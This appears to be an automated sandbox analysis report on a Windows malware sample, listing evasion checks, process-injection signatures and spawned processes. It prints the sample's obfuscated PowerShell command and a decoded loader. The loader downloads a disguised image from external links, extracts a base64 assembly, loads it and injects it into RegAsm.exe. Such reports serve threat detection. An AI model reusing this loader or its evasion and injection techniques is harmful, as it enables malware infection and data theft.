                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTR
                    Checks if the current machine is a virtual machine (disk enumeration)
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXEAUTORUNSC.EX
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AEB77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEP
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AEB77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2238Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1254Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3704Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6067Jump to behavior
                    Source: C:\Users\user\Desktop\good.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2343
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep count: 3704 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep count: 6067 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF73191204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73191204C
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319164E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7319164E4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FngTask_v1.0.MSFT_NetEventVmNetworkAdatper.cdxml.
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xmlT_
                    Source: fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7319130EC
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B00283 mov eax, dword ptr fs:[00000030h]12_3_02B00283
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731918790 SetUnhandledExceptionFilter,0_2_00007FF731918790
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731918494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF731918494

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi64_8112.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTR
                    .NET source code references suspicious native API functions
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 449000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47C000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1169008Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zgbn@gg@z@@v@gy@zwbk@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@c4@agbw@gc@pw@1@de@nw@2@de@mw@n@cw@i@@n@gg@d@@z@du@lwbu@ge@bgbv@c8@cgbl@gy@cw@v@gg@zqbh@gq@cw@v@g0@yqbp@g4@lwbu@gu@dwbf@gk@bqbn@de@mg@z@c4@agbw@gc@jw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@pq@g@eq@bwb3@g4@b@bv@ge@z@be@ge@d@bh@ey@cgbv@g0@t@bp@g4@awbz@c@@j@bs@gk@bgbr@hm@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@c0@bgbl@c@@j@bu@hu@b@bs@ck@i@b7@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@g@d0@i@bb@fm@eqbz@hq@zqbt@c4@v@bl@hg@d@@u@eu@bgbj@g8@z@bp@g4@zwbd@do@ogbv@fq@rg@4@c4@rwbl@hq@uwb0@hi@aqbu@gc@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbt@fq@qqbs@fq@pg@+@cc@ow@g@cq@zqbu@gq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@eu@tgbe@d4@pg@n@ds@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@hm@d@bh@hi@d@bg@gw@yqbn@ck@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@zqbu@gq@rgbs@ge@zw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@hm@d@bh@hi@d